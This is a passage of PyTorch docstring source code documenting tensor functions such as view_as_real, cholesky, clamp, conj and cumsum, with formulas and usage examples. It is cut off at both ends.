tensor([ 0.3100, -0.5445, -1.6492, -0.0638])
""".format(**common_args))
add_docstr(torch.imag,
r"""
imag(input) -> Tensor
Returns a new tensor containing imaginary values of the :attr:`self` tensor.
The returned tensor and :attr:`self` share the same underlying storage.
.. warning::
:func:`imag` is only supported for tensors with complex dtypes.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.3100+0.3553j), (-0.5445-0.7896j), (-1.6492-0.0633j), (-0.0638-0.8119j)])
>>> x.imag
tensor([ 0.3553, -0.7896, -0.0633, -0.8119])
""".format(**common_args))
add_docstr(torch.view_as_real,
r"""
view_as_real(input) -> Tensor
Returns a view of :attr:`input` as a real tensor. For an input complex tensor of
:attr:`size` :math:`m1, m2, \dots, mi`, this function returns a new
real tensor of size :math:`m1, m2, \dots, mi, 2`, where the last dimension of size 2
represents the real and imaginary components of complex numbers.
.. warning::
:func:`view_as_real` is only supported for tensors with ``complex dtypes``.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.4737-0.3839j), (-0.2098-0.6699j), (0.3470-0.9451j), (-0.5174-1.3136j)])
>>> torch.view_as_real(x)
tensor([[ 0.4737, -0.3839],
[-0.2098, -0.6699],
[ 0.3470, -0.9451],
[-0.5174, -1.3136]])
""".format(**common_args))
add_docstr(torch.view_as_complex,
r"""
view_as_complex(input) -> Tensor
Returns a view of :attr:`input` as a complex tensor. For an input complex
tensor of :attr:`size` :math:`m1, m2, \dots, mi, 2`, this function returns a
new complex tensor of :attr:`size` :math:`m1, m2, \dots, mi` where the last
dimension of the input tensor is expected to represent the real and imaginary
components of complex numbers.
.. warning::
:func:`view_as_complex` is only supported for tensors with
:class:`torch.dtype` ``torch.float64`` and ``torch.float32``. The input is
expected to have the last dimension of :attr:`size` 2. In addition, the
tensor must have a `stride` of 1 for its last dimension. The strides of all
other dimensions must be even numbers.
Args:
{input}
Example::
>>> x=torch.randn(4, 2)
>>> x
tensor([[ 1.6116, -0.5772],
[-1.4606, -0.9120],
[ 0.0786, -1.7497],
[-0.6561, -1.6623]])
>>> torch.view_as_complex(x)
tensor([(1.6116-0.5772j), (-1.4606-0.9120j), (0.0786-1.7497j), (-0.6561-1.6623j)])
""".format(**common_args))
add_docstr(torch.reciprocal,
r"""
reciprocal(input, *, out=None) -> Tensor
Returns a new tensor with the reciprocal of the elements of :attr:`input`
.. math::
\text{out}_{i} = \frac{1}{\text{input}_{i}}
.. note::
Unlike NumPy's reciprocal, torch.reciprocal supports integral inputs. Integral
inputs to reciprocal are automatically :ref:`promoted <type-promotion-doc>` to
the default scalar type.
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.4595, -2.1219, -1.4314, 0.7298])
>>> torch.reciprocal(a)
tensor([-2.1763, -0.4713, -0.6986, 1.3702])
""".format(**common_args))
add_docstr(torch.cholesky, r"""
cholesky(input, upper=False, *, out=None) -> Tensor
Computes the Cholesky decomposition of a symmetric positive-definite
matrix :math:`A` or for batches of symmetric positive-definite matrices.
If :attr:`upper` is ``True``, the returned matrix ``U`` is upper-triangular, and
the decomposition has the form:
.. math::
A = U^TU
If :attr:`upper` is ``False``, the returned matrix ``L`` is lower-triangular, and
the decomposition has the form:
.. math::
A = LL^T
If :attr:`upper` is ``True``, and :math:`A` is a batch of symmetric positive-definite
matrices, then the returned tensor will be composed of upper-triangular Cholesky factors
of each of the individual matrices. Similarly, when :attr:`upper` is ``False``, the returned
tensor will be composed of lower-triangular Cholesky factors of each of the individual
matrices.
.. warning::
:func:`torch.cholesky` is deprecated in favor of :func:`torch.linalg.cholesky`
and will be removed in a future PyTorch release.
``L = torch.cholesky(A)`` should be replaced with
.. code:: python
L = torch.linalg.cholesky(A)
``U = torch.cholesky(A, upper=True)`` should be replaced with
.. code:: python
U = torch.linalg.cholesky(A).mH
This transform will produce equivalent results for all valid (symmetric positive definite) inputs.
Args:
input (Tensor): the input tensor :math:`A` of size :math:`(*, n, n)` where `*` is zero or more
batch dimensions consisting of symmetric positive-definite matrices.
upper (bool, optional): flag that indicates whether to return an
upper or lower triangular matrix. Default: ``False``
Keyword args:
out (Tensor, optional): the output matrix
Example::
>>> a = torch.randn(3, 3)
>>> a = a @ a.mT + 1e-3 # make symmetric positive-definite
>>> l = torch.cholesky(a)
>>> a
tensor([[ 2.4112, -0.7486, 1.4551],
[-0.7486, 1.3544, 0.1294],
[ 1.4551, 0.1294, 1.6724]])
>>> l
tensor([[ 1.5528, 0.0000, 0.0000],
[-0.4821, 1.0592, 0.0000],
[ 0.9371, 0.5487, 0.7023]])
>>> l @ l.mT
tensor([[ 2.4112, -0.7486, 1.4551],
[-0.7486, 1.3544, 0.1294],
[ 1.4551, 0.1294, 1.6724]])
>>> a = torch.randn(3, 2, 2) # Example for batched input
>>> a = a @ a.mT + 1e-03 # make symmetric positive-definite
>>> l = torch.cholesky(a)
>>> z = l @ l.mT
>>> torch.dist(z, a)
tensor(2.3842e-07)
""")
add_docstr(torch.cholesky_solve, r"""
cholesky_solve(input, input2, upper=False, *, out=None) -> Tensor
Solves a linear system of equations with a positive semidefinite
matrix to be inverted given its Cholesky factor matrix :math:`u`.
If :attr:`upper` is ``False``, :math:`u` is lower triangular and `c` is
returned such that:
.. math::
c = (u u^T)^{-1} b
If :attr:`upper` is ``True``, :math:`u` is upper triangular
and `c` is returned such that:
.. math::
c = (u^T u)^{-1} b
`torch.cholesky_solve(b, u)` can take in 2D inputs `b, u` or inputs that are
batches of 2D matrices. If the inputs are batches, then returns
batched outputs `c`
Supports real-valued and complex-valued inputs.
For the complex-valued inputs the transpose operator above is the conjugate transpose.
Args:
input (Tensor): input matrix :math:`b` of size :math:`(*, m, k)`,
where :math:`*` is zero or more batch dimensions
input2 (Tensor): input matrix :math:`u` of size :math:`(*, m, m)`,
where :math:`*` is zero or more batch dimensions composed of
upper or lower triangular Cholesky factor
upper (bool, optional): whether to consider the Cholesky factor as a
lower or upper triangular matrix. Default: ``False``.
Keyword args:
out (Tensor, optional): the output tensor for `c`
Example::
>>> a = torch.randn(3, 3)
>>> a = torch.mm(a, a.t()) # make symmetric positive definite
>>> u = torch.linalg.cholesky(a)
>>> a
tensor([[ 0.7747, -1.9549, 1.3086],
[-1.9549, 6.7546, -5.4114],
[ 1.3086, -5.4114, 4.8733]])
>>> b = torch.randn(3, 2)
>>> b
tensor([[-0.6355, 0.9891],
[ 0.1974, 1.4706],
[-0.4115, -0.6225]])
>>> torch.cholesky_solve(b, u)
tensor([[ -8.1625, 19.6097],
[ -5.8398, 14.2387],
[ -4.3771, 10.4173]])
>>> torch.mm(a.inverse(), b)
tensor([[ -8.1626, 19.6097],
[ -5.8398, 14.2387],
[ -4.3771, 10.4173]])
""")
add_docstr(torch.cholesky_inverse, r"""
cholesky_inverse(input, upper=False, *, out=None) -> Tensor
Computes the inverse of a symmetric positive-definite matrix :math:`A` using its
Cholesky factor :math:`u`: returns matrix ``inv``. The inverse is computed using
LAPACK routines ``dpotri`` and ``spotri`` (and the corresponding MAGMA routines).
If :attr:`upper` is ``False``, :math:`u` is lower triangular
such that the returned tensor is
.. math::
inv = (uu^{T})^{-1}
If :attr:`upper` is ``True``, :math:`u` is upper
triangular such that the returned tensor is
.. math::
inv = (u^T u)^{-1}
Supports input of float, double, cfloat and cdouble dtypes.
Also supports batches of matrices, and if :math:`A` is a batch of matrices then the output has the same batch dimensions.
Args:
input (Tensor): the input tensor :math:`A` of size :math:`(*, n, n)`,
consisting of symmetric positive-definite matrices
where :math:`*` is zero or more batch dimensions.
upper (bool, optional): flag that indicates whether to return an
upper or lower triangular matrix. Default: False
Keyword args:
out (Tensor, optional): the output tensor for `inv`
Example::
>>> a = torch.randn(3, 3)
>>> a = torch.mm(a, a.t()) + 1e-05 * torch.eye(3) # make symmetric positive definite
>>> u = torch.linalg.cholesky(a)
>>> a
tensor([[ 0.9935, -0.6353, 1.5806],
[ -0.6353, 0.8769, -1.7183],
[ 1.5806, -1.7183, 10.6618]])
>>> torch.cholesky_inverse(u)
tensor([[ 1.9314, 1.2251, -0.0889],
[ 1.2251, 2.4439, 0.2122],
[-0.0889, 0.2122, 0.1412]])
>>> a.inverse()
tensor([[ 1.9314, 1.2251, -0.0889],
[ 1.2251, 2.4439, 0.2122],
[-0.0889, 0.2122, 0.1412]])
>>> a = torch.randn(3, 2, 2) # Example for batched input
>>> a = a @ a.mT + 1e-03 # make symmetric positive-definite
>>> l = torch.linalg.cholesky(a)
>>> z = l @ l.mT
>>> torch.dist(z, a)
tensor(3.5894e-07)
""")
add_docstr(torch.clone, r"""
clone(input, *, memory_format=torch.preserve_format) -> Tensor
Returns a copy of :attr:`input`.
.. note::
This function is differentiable, so gradients will flow back from the
result of this operation to :attr:`input`. To create a tensor without an
autograd relationship to :attr:`input` see :meth:`~Tensor.detach`.
Args:
{input}
Keyword args:
{memory_format}
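The example below is a minimal illustration: the clone owns its own copy of the data, so modifying it leaves the original tensor unchanged.
Example::
>>> a = torch.tensor([1., 2., 3.])
>>> b = torch.clone(a)
>>> b[0] = 5.
>>> a
tensor([1., 2., 3.])
>>> b
tensor([5., 2., 3.])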
""".format(**common_args))
add_docstr(torch.clamp, r"""
clamp(input, min=None, max=None, *, out=None) -> Tensor
Clamps all elements in :attr:`input` into the range `[` :attr:`min`, :attr:`max` `]`.
Letting min_value and max_value be :attr:`min` and :attr:`max`, respectively, this returns:
.. math::
y_i = \min(\max(x_i, \text{min\_value}_i), \text{max\_value}_i)
If :attr:`min` is ``None``, there is no lower bound; if :attr:`max` is ``None``, there is no upper bound.
""" + r"""
.. note::
If :attr:`min` is greater than :attr:`max` :func:`torch.clamp(..., min, max) <torch.clamp>`
sets all elements in :attr:`input` to the value of :attr:`max`.
Args:
{input}
min (Number or Tensor, optional): lower-bound of the range to be clamped to
max (Number or Tensor, optional): upper-bound of the range to be clamped to
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-1.7120, 0.1734, -0.0478, -0.0922])
>>> torch.clamp(a, min=-0.5, max=0.5)
tensor([-0.5000, 0.1734, -0.0478, -0.0922])
>>> min = torch.linspace(-1, 1, steps=4)
>>> torch.clamp(a, min=min)
tensor([-1.0000, 0.1734, 0.3333, 1.0000])
""".format(**common_args))
add_docstr(torch.clip, r"""
clip(input, min=None, max=None, *, out=None) -> Tensor
Alias for :func:`torch.clamp`.
""")
add_docstr(torch.column_stack,
r"""
column_stack(tensors, *, out=None) -> Tensor
Creates a new tensor by horizontally stacking the tensors in :attr:`tensors`.
Equivalent to ``torch.hstack(tensors)``, except each zero or one dimensional tensor ``t``
in :attr:`tensors` is first reshaped into a ``(t.numel(), 1)`` column before being stacked horizontally.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.column_stack((a, b))
tensor([[1, 4],
[2, 5],
[3, 6]])
>>> a = torch.arange(5)
>>> b = torch.arange(10).reshape(5, 2)
>>> torch.column_stack((a, b, b))
tensor([[0, 0, 1, 0, 1],
[1, 2, 3, 2, 3],
[2, 4, 5, 4, 5],
[3, 6, 7, 6, 7],
[4, 8, 9, 8, 9]])
""".format(**common_args))
add_docstr(torch.complex,
r"""
complex(real, imag, *, out=None) -> Tensor
Constructs a complex tensor with its real part equal to :attr:`real` and its
imaginary part equal to :attr:`imag`.
Args:
real (Tensor): The real part of the complex tensor. Must be float or double.
imag (Tensor): The imaginary part of the complex tensor. Must be same dtype
as :attr:`real`.
Keyword args:
out (Tensor): If the inputs are ``torch.float32``, must be
``torch.complex64``. If the inputs are ``torch.float64``, must be
``torch.complex128``.
Example::
>>> real = torch.tensor([1, 2], dtype=torch.float32)
>>> imag = torch.tensor([3, 4], dtype=torch.float32)
>>> z = torch.complex(real, imag)
>>> z
tensor([(1.+3.j), (2.+4.j)])
>>> z.dtype
torch.complex64
""")
add_docstr(torch.polar,
r"""
polar(abs, angle, *, out=None) -> Tensor
Constructs a complex tensor whose elements are Cartesian coordinates
corresponding to the polar coordinates with absolute value :attr:`abs` and angle
:attr:`angle`.
.. math::
\text{out} = \text{abs} \cdot \cos(\text{angle}) + \text{abs} \cdot \sin(\text{angle}) \cdot j
.. note::
`torch.polar` is similar to
`std::polar <https://en.cppreference.com/w/cpp/numeric/complex/polar>`_
and does not compute the polar decomposition
of a complex tensor like Python's `cmath.polar` and SciPy's `linalg.polar` do.
The behavior of this function is undefined if `abs` is negative or NaN, or if `angle` is
infinite.
""" + r"""
Args:
abs (Tensor): The absolute value of the complex tensor. Must be float or double.
angle (Tensor): The angle of the complex tensor. Must be same dtype as
:attr:`abs`.
Keyword args:
out (Tensor): If the inputs are ``torch.float32``, must be
``torch.complex64``. If the inputs are ``torch.float64``, must be
``torch.complex128``.
Example::
>>> import numpy as np
>>> abs = torch.tensor([1, 2], dtype=torch.float64)
>>> angle = torch.tensor([np.pi / 2, 5 * np.pi / 4], dtype=torch.float64)
>>> z = torch.polar(abs, angle)
>>> z
tensor([(0.0000+1.0000j), (-1.4142-1.4142j)], dtype=torch.complex128)
""")
add_docstr(torch.conj_physical,
r"""
conj_physical(input, *, out=None) -> Tensor
Computes the element-wise conjugate of the given :attr:`input` tensor.
If :attr:`input` has a non-complex dtype, this function just returns :attr:`input`.
.. note::
This performs the conjugate operation regardless of whether the conjugate bit is set.
.. warning:: In the future, :func:`torch.conj_physical` may return a non-writeable view for an :attr:`input` of
non-complex dtype. It's recommended that programs not modify the tensor returned by :func:`torch.conj_physical`
when :attr:`input` is of non-complex dtype to be compatible with this change.
.. math::
\text{out}_{i} = conj(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.conj_physical(torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j]))
tensor([-1 - 1j, -2 - 2j, 3 + 3j])
""".format(**common_args))
add_docstr(torch.conj,
r"""
conj(input) -> Tensor
Returns a view of :attr:`input` with a flipped conjugate bit. If :attr:`input` has a non-complex dtype,
this function just returns :attr:`input`.
.. note::
:func:`torch.conj` performs a lazy conjugation, but the actual conjugated tensor can be materialized
at any time using :func:`torch.resolve_conj`.
.. warning:: In the future, :func:`torch.conj` may return a non-writeable view for an :attr:`input` of
non-complex dtype. It's recommended that programs not modify the tensor returned by :func:`torch.conj`
when :attr:`input` is of non-complex dtype to be compatible with this change.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> x.is_conj()
False
>>> y = torch.conj(x)
>>> y.is_conj()
True
""".format(**common_args))
add_docstr(torch.resolve_conj,
r"""
resolve_conj(input) -> Tensor
Returns a new tensor with materialized conjugation if :attr:`input`'s conjugate bit is set to `True`,
else returns :attr:`input`. The output tensor will always have its conjugate bit set to `False`.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> y = x.conj()
>>> y.is_conj()
True
>>> z = y.resolve_conj()
>>> z
tensor([-1 - 1j, -2 - 2j, 3 + 3j])
>>> z.is_conj()
False
""".format(**common_args))
add_docstr(torch.resolve_neg,
r"""
resolve_neg(input) -> Tensor
Returns a new tensor with materialized negation if :attr:`input`'s negative bit is set to `True`,
else returns :attr:`input`. The output tensor will always have its negative bit set to `False`.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> y = x.conj()
>>> z = y.imag
>>> z.is_neg()
True
>>> out = z.resolve_neg()
>>> out
tensor([-1., -2., 3.])
>>> out.is_neg()
False
""".format(**common_args))
add_docstr(torch.copysign,
r"""
copysign(input, other, *, out=None) -> Tensor
Create a new floating-point tensor with the magnitude of :attr:`input` and the sign of :attr:`other`, elementwise.
.. math::
\text{out}_{i} = \begin{cases}
-|\text{input}_{i}| & \text{if } \text{other}_{i} \leq -0.0 \\
|\text{input}_{i}| & \text{if } \text{other}_{i} \geq 0.0 \\
\end{cases}
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
and integer and float inputs.
Args:
input (Tensor): magnitudes.
other (Tensor or Number): contains value(s) whose signbit(s) are
applied to the magnitudes in :attr:`input`.
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-1.2557, -0.0026, -0.5387, 0.4740, -0.9244])
>>> torch.copysign(a, 1)
tensor([1.2557, 0.0026, 0.5387, 0.4740, 0.9244])
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.7079, 0.2778, -1.0249, 0.5719],
[-0.0059, -0.2600, -0.4475, -1.3948],
[ 0.3667, -0.9567, -2.5757, -0.1751],
[ 0.2046, -0.0742, 0.2998, -0.1054]])
>>> b = torch.randn(4)
>>> b
tensor([ 0.2373, 0.3120, 0.3190, -1.1128])
>>> torch.copysign(a, b)
tensor([[ 0.7079, 0.2778, 1.0249, -0.5719],
[ 0.0059, 0.2600, 0.4475, -1.3948],
[ 0.3667, 0.9567, 2.5757, -0.1751],
[ 0.2046, 0.0742, 0.2998, -0.1054]])
""".format(**common_args))
add_docstr(torch.cos,
r"""
cos(input, *, out=None) -> Tensor
Returns a new tensor with the cosine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \cos(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 1.4309, 1.2706, -0.8562, 0.9796])
>>> torch.cos(a)
tensor([ 0.1395, 0.2957, 0.6553, 0.5574])
""".format(**common_args))
add_docstr(torch.cosh,
r"""
cosh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic cosine of the elements of
:attr:`input`.
.. math::
\text{out}_{i} = \cosh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.1632, 1.1835, -0.6979, -0.7325])
>>> torch.cosh(a)
tensor([ 1.0133, 1.7860, 1.2536, 1.2805])
.. note::
When :attr:`input` is on the CPU, the implementation of torch.cosh may use
the Sleef library, which rounds very large results to infinity or negative
infinity. See `here <https://sleef.org/purec.xhtml>`_ for details.
""".format(**common_args))
add_docstr(torch.cross,
r"""
cross(input, other, dim=None, *, out=None) -> Tensor
Returns the cross product of vectors in dimension :attr:`dim` of :attr:`input`
and :attr:`other`.
Supports input of float, double, cfloat and cdouble dtypes. Also supports batches
of vectors, for which it computes the product along the dimension :attr:`dim`.
In this case, the output has the same batch dimensions as the inputs.
If :attr:`dim` is not given, it defaults to the first dimension found with the
size 3. Note that this might be unexpected.
.. seealso::
:func:`torch.linalg.cross` which requires specifying dim (defaulting to -1).
.. warning:: This function may change in a future PyTorch release to match
the default behaviour in :func:`torch.linalg.cross`. We recommend using
:func:`torch.linalg.cross`.
Args:
{input}
other (Tensor): the second input tensor
dim (int, optional): the dimension to take the cross-product in.
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 3)
>>> a
tensor([[-0.3956, 1.1455, 1.6895],
[-0.5849, 1.3672, 0.3599],
[-1.1626, 0.7180, -0.0521],
[-0.1339, 0.9902, -2.0225]])
>>> b = torch.randn(4, 3)
>>> b
tensor([[-0.0257, -1.4725, -1.2251],
[-1.1479, -0.7005, -1.9757],
[-1.3904, 0.3726, -1.1836],
[-0.9688, -0.7153, 0.2159]])
>>> torch.cross(a, b, dim=1)
tensor([[ 1.0844, -0.5281, 0.6120],
[-2.4490, -1.5687, 1.9792],
[-0.8304, -1.3037, 0.5650],
[-1.2329, 1.9883, 1.0551]])
>>> torch.cross(a, b)
tensor([[ 1.0844, -0.5281, 0.6120],
[-2.4490, -1.5687, 1.9792],
[-0.8304, -1.3037, 0.5650],
[-1.2329, 1.9883, 1.0551]])
""".format(**common_args))
add_docstr(torch.logcumsumexp,
r"""
logcumsumexp(input, dim, *, out=None) -> Tensor
Returns the logarithm of the cumulative summation of the exponentiation of
elements of :attr:`input` in the dimension :attr:`dim`.
For summation index :math:`j` given by `dim` and other indices :math:`i`, the result is
.. math::
\text{{logcumsumexp}}(x)_{{ij}} = \log \sum\limits_{{j=0}}^{{i}} \exp(x_{{ij}})
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{out}
Example::
>>> a = torch.randn(10)
>>> torch.logcumsumexp(a, dim=0)
tensor([-0.42296738, -0.04462666, 0.86278635, 0.94622083, 1.05277811,
1.39202815, 1.83525007, 1.84492621, 2.06084887, 2.06844475])
""".format(**reduceops_common_args))
add_docstr(torch.cummax,
r"""
cummax(input, dim, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the cumulative maximum of
elements of :attr:`input` in the dimension :attr:`dim`. And ``indices`` is the index
location of each maximum value found in the dimension :attr:`dim`.
.. math::
y_i = max(x_1, x_2, x_3, \dots, x_i)
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.3449, -1.5447, 0.0685, -1.5104, -1.1706, 0.2259, 1.4696, -1.3284,
1.9946, -0.8209])
>>> torch.cummax(a, dim=0)
torch.return_types.cummax(
values=tensor([-0.3449, -0.3449, 0.0685, 0.0685, 0.0685, 0.2259, 1.4696, 1.4696,
1.9946, 1.9946]),
indices=tensor([0, 0, 2, 2, 2, 5, 6, 6, 8, 8]))
""".format(**reduceops_common_args))
add_docstr(torch.cummin,
r"""
cummin(input, dim, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the cumulative minimum of
elements of :attr:`input` in the dimension :attr:`dim`. And ``indices`` is the index
location of each minimum value found in the dimension :attr:`dim`.
.. math::
y_i = min(x_1, x_2, x_3, \dots, x_i)
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.2284, -0.6628, 0.0975, 0.2680, -1.3298, -0.4220, -0.3885, 1.1762,
0.9165, 1.6684])
>>> torch.cummin(a, dim=0)
torch.return_types.cummin(
values=tensor([-0.2284, -0.6628, -0.6628, -0.6628, -1.3298, -1.3298, -1.3298, -1.3298,
-1.3298, -1.3298]),
indices=tensor([0, 1, 1, 1, 4, 4, 4, 4, 4, 4]))
""".format(**reduceops_common_args))
add_docstr(torch.cumprod,
r"""
cumprod(input, dim, *, dtype=None, out=None) -> Tensor
Returns the cumulative product of elements of :attr:`input` in the dimension
:attr:`dim`.
For example, if :attr:`input` is a vector of size N, the result will also be
a vector of size N, with elements given by
.. math::
y_i = x_1 \times x_2\times x_3\times \dots \times x_i
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{dtype}
{out}
Example::
>>> a = torch.randn(10)
>>> a
tensor([ 0.6001, 0.2069, -0.1919, 0.9792, 0.6727, 1.0062, 0.4126,
-0.2129, -0.4206, 0.1968])
>>> torch.cumprod(a, dim=0)
tensor([ 0.6001, 0.1241, -0.0238, -0.0233, -0.0157, -0.0158, -0.0065,
0.0014, -0.0006, -0.0001])
>>> a[5] = 0.0
>>> torch.cumprod(a, dim=0)
tensor([ 0.6001, 0.1241, -0.0238, -0.0233, -0.0157, -0.0000, -0.0000,
0.0000, -0.0000, -0.0000])
""".format(**reduceops_common_args))
add_docstr(torch.cumsum,
r"""
cumsum(input, dim, *, dtype=None, out=None) -> Tensor
Returns the cumulative sum of elements of :attr:`input` in the dimension
:attr:`dim`.
For example, if :attr:`input` is a vector of size N, the result will also be
a vector of size N, with elements given by
.. math::
y_i = x_1 + x_2 + x_3 + \dots + x_i
Args:
{input}
dim (int): the dimension to do the operation over
Keyword args:
{dtype}
{out}
Example::
>>> a = torch.randn(10)
>>> a
tensor([-0.8286, -0.4890, 0.5155, 0.8443, 0.1865, -0.1752, -2.0595,
0.1850, -1.1571, -0.4243])
>>> torch.cumsum(a, dim=0)
tensor([-0.8286, -1.3175, -0.8020, 0.0423, 0.2289, 0.0537, -2.0058,
-1.8209, -2.9780, -3.4022])
""".format(**reduceops_common_args))
add_docstr(torch.count_nonzero,
r"""
count_nonzero(input, dim=None) -> Tensor
Counts the number of non-zero values in the tensor :attr:`input` along the given :attr:`dim`.
If no dim is specified then all non-zeros in the tensor are counted.
Args:
{input}
dim (int or tuple of ints, optional): Dim or tuple of dims along which to count non-zeros.
Example::
>>> x = torch.zeros(3,3)
>>> x[torch.randn(3,3) > 0.5] = 1
>>> x
tensor([[0., 1., 1.],
[0., 0., 0.],
[0., 0., 1.]])
>>> torch.count_nonzero(x)
tensor(3)
>>> torch.count_nonzero(x, dim=0)
tensor([0, 1, 2])
""".format(**reduceops_common_args))
add_docstr(torch.dequantize,
r"""
dequantize(tensor) -> Tensor
Returns an fp32 Tensor by dequantizing a quantized Tensor
Args:
tensor (Tensor): A quantized Tensor
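The example below is a minimal illustration; it assumes a tensor quantized with :func:`torch.quantize_per_tensor` using scale ``0.1`` and zero point ``10``, so the round trip recovers the original values exactly.
Example::
>>> x = torch.tensor([-1.0, 0.0, 1.0])
>>> qx = torch.quantize_per_tensor(x, 0.1, 10, torch.quint8)
>>> torch.dequantize(qx)
tensor([-1., 0., 1.])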
.. function:: dequantize(tensors) -> sequence of Tensors
:noindex:
Given a list of quantized Tensors, dequantize them and return a list of fp32 Tensors
Args:
tensors (sequence of Tensors): A list of quantized Tensors
""")
add_docstr(torch.diag,
r"""
diag(input, diagonal=0, *, out=None) -> Tensor
- If :attr:`input` is a vector (1-D tensor), then returns a 2-D square tensor
with the elements of :attr:`input` as the diagonal.
- If :attr:`input` is a matrix (2-D tensor), then returns a 1-D tensor with
the diagonal elements of :attr:`input`.
The argument :attr:`diagonal` controls which diagonal to consider:
- If :attr:`diagonal` = 0, it is the main diagonal.
- If :attr:`diagonal` > 0, it is above the main diagonal.
- If :attr:`diagonal` < 0, it is below the main diagonal.
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
.. seealso::
:func:`torch.diagonal` always returns the diagonal of its input.
:func:`torch.diagflat` always constructs a tensor with diagonal elements
specified by the input.
Examples:
Get the square matrix where the input vector is the diagonal::
>>> a = torch.randn(3)
>>> a
tensor([ 0.5950,-0.0872, 2.3298])
>>> torch.diag(a)
tensor([[ 0.5950, 0.0000, 0.0000],
[ 0.0000,-0.0872, 0.0000],
[ 0.0000, 0.0000, 2.3298]])
>>> torch.diag(a, 1)
tensor([[ 0.0000, 0.5950, 0.0000, 0.0000],
[ 0.0000, 0.0000,-0.0872, 0.0000],
[ 0.0000, 0.0000, 0.0000, 2.3298],
[ 0.0000, 0.0000, 0.0000, 0.0000]])
Get the k-th diagonal of a given matrix::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-0.4264, 0.0255,-0.1064],
[ 0.8795,-0.2429, 0.1374],
[ 0.1029,-0.6482,-1.6300]])
>>> torch.diag(a, 0)
tensor([-0.4264,-0.2429,-1.6300])
>>> torch.diag(a, 1)
tensor([ 0.0255, 0.1374])
""".format(**common_args))
add_docstr(torch.diag_embed,
r"""
diag_embed(input, offset=0, dim1=-2, dim2=-1) -> Tensor
Creates a tensor whose diagonals of certain 2D planes (specified by
:attr:`dim1` and :attr:`dim2`) are filled by :attr:`input`.
To facilitate creating batched diagonal matrices, the 2D planes formed by
the last two dimensions of the returned tensor are chosen by default.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
The size of the new matrix will be calculated to make the specified diagonal
of the size of the last input dimension.
Note that for :attr:`offset` other than :math:`0`, the order of :attr:`dim1`
and :attr:`dim2` matters. Exchanging them is equivalent to changing the
sign of :attr:`offset`.
Applying :meth:`torch.diagonal` to the output of this function with
the same arguments yields a matrix identical to input. However,
:meth:`torch.diagonal` has different default dimensions, so those
need to be explicitly specified.
Args:
{input} Must be at least 1-dimensional.
offset (int, optional): which diagonal to consider. Default: 0
(main diagonal).
dim1 (int, optional): first dimension with respect to which to
take diagonal. Default: -2.
dim2 (int, optional): second dimension with respect to which to
take diagonal. Default: -1.
Example::
>>> a = torch.randn(2, 3)
>>> torch.diag_embed(a)
tensor([[[ 1.5410, 0.0000, 0.0000],
[ 0.0000, -0.2934, 0.0000],
[ 0.0000, 0.0000, -2.1788]],
[[ 0.5684, 0.0000, 0.0000],
[ 0.0000, -1.0845, 0.0000],
[ 0.0000, 0.0000, -1.3986]]])
>>> torch.diag_embed(a, offset=1, dim1=0, dim2=2)
tensor([[[ 0.0000, 1.5410, 0.0000, 0.0000],
[ 0.0000, 0.5684, 0.0000, 0.0000]],
[[ 0.0000, 0.0000, -0.2934, 0.0000],
[ 0.0000, 0.0000, -1.0845, 0.0000]],
[[ 0.0000, 0.0000, 0.0000, -2.1788],
[ 0.0000, 0.0000, 0.0000, -1.3986]],
[[ 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.0000, 0.0000, 0.0000, 0.0000]]])
""".format(**common_args))
add_docstr(torch.diagflat,
r"""
diagflat(input, offset=0) -> Tensor
- If :attr:`input` is a vector (1-D tensor), then returns a 2-D square tensor
with the elements of :attr:`input` as the diagonal.
- If :attr:`input` is a tensor with more than one dimension, then returns a
2-D tensor with diagonal elements equal to a flattened :attr:`input`.
The argument :attr:`offset` controls which diagonal to consider:
- If :attr:`offset` = 0, it is the main diagonal.
- If :attr:`offset` > 0, it is above the main diagonal.
- If :attr:`offset` < 0, it is below the main diagonal.
Args:
{input}
offset (int, optional): the diagonal to consider. Default: 0 (main
diagonal).
Examples::
>>> a = torch.randn(3)
>>> a
tensor([-0.2956, -0.9068, 0.1695])
>>> torch.diagflat(a)
